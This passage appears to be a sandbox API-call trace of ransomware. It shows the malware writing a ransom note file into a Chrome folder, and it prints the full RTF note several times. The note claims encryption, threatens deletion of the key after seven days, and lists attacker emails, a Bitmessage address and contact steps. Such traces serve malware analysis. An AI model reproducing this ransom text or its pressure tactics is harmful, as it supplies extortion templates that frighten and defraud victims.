\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a558, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0207.601] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a558*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a558*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0207.602] CloseHandle (hObject=0x2f4) returned 1 [0207.602] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\#readme_eman#.rtf")) returned 0xffffffff [0207.602] GetLastError () returned 0x2 [0207.602] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0207.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.602] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 